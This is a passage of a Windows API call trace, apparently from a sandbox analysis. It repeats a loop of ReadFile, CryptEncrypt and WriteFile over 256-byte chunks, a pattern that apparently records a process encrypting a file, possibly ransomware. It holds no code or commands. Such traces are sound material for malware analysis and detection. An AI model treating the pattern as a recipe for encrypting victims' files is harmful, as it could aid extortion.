[0164.012] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.012] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.012] GetLastError () returned 0x0 [0164.012] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.013] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.013] GetLastError () returned 0x0 [0164.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.013] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.014] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.014] GetLastError () returned 0x0 [0164.014] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.014] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.015] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.015] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.015] GetLastError () returned 0x0 [0164.015] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.016] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.016] GetLastError () returned 0x0 [0164.016] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.016] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.017] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.017] GetLastError () returned 0x0 [0164.017] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.017] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.018] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, 